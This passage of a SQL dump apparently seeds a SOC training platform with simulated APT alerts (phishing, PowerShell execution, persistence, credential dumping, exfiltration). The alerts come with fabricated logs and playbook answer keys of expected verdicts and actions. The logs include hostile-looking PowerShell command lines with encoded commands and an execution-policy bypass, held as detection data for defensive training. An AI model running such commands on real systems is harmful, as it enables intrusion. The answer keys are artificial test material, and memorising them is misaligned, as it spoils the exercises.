attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name mimics legitimate invoice documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.975Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(380, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) logs', 'The malicious attachment was opened, leading to the execution of a payload that attempts to establish a foothold within the network.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24=\",\"file_hash\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"filename\":\"malicious_attachment.docx\",\"threat_level\":\"high\",\"description\":\"Suspicious PowerShell command execution detected.\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user jdoe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"reputation_database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_attachment.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"File used to deliver malicious payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(381, 'Persistence Mechanism Installed', 'medium', 'Registry and Scheduled Task Logs', 'APT1 establishes persistence by creating scheduled tasks and modifying registry keys to maintain access even after reboots.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:35Z\",\"event_id\":7045,\"source\":\"Service Control Manager\",\"description\":\"A service was installed in the system.\",\"service_name\":\"UpdateService\",\"service_file\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"registry_modification\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\UpdateService\",\"scheduled_task_creation\":{\"task_name\":\"UpdateTask\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\updatetask.exe\",\"task_user\":\"SYSTEM\"},\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT1 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used by APT1.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"Username used in suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(382, 'Credential Dumping Detected', 'high', 'Security Information and Event Management (SIEM) alerts', 'APT1 is attempting lateral movement by utilizing harvested credentials to access critical systems within the network. Anomalous login attempts detected from an unauthorized source IP address.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:17Z\",\"event_id\":\"4625\",\"log_source\":\"Windows Security Log\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"admin_user\",\"logon_type\":\"3\",\"failure_reason\":\"Unknown user name or bad password\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_message\":\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Username of a privileged account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(383, 'Data Exfiltration Attempt', 'high', 'Network Traffic Analysis', 'In the final phase, APT1 attempts to exfiltrate sensitive data to an external server, marking the culmination of the attack.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T14:22:35Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"method\":\"POST\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"bytes_sent\":10485760,\"uri\":\"/api/upload\",\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"john.doe\",\"status_code\":200}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT1 command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious data exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"File contains sensitive data intended for exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_hr\",\"verdict\":\"internal\",\"details\":\"Legitimate user credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(384, 'Spear Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT3 initiates their attack with a well-crafted spear phishing email, targeting key employees to gain a foothold into the network. The email contains a malicious attachment designed to exploit the recipient\'s system.', 'Initial Access', 'T1566.001', 1, 'Closed', 290, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"email_subject\":\"Urgent: Action Required for Your Account\",\"email_sender\":\"john.doe@fakecompany.com\",\"email_recipient\":\"jane.smith@targetcompany.com\",\"attachment\":{\"filename\":\"Invoice_2023.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-01-04 02:06:57', '2026-03-12 15:08:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT3 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of targeted employee within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@fakecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in a known spear phishing campaign by APT3.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with a malicious document used in phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.980Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(385, 'Malicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'APT3 executed a PowerShell script on a compromised system to deploy additional payloads, aiming to maintain a stealthy presence and further infiltrate the network.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host-01\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.24\",\"internal_ip\":\"10.0.1.15\",\"script_name\":\"Invoke-MaliciousScript.ps1\",\"script_hash\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"process_id\":\"4567\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\",\"parent_process\":\"explorer.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT3\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoke-MaliciousScript.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used by APT3\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT3 payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 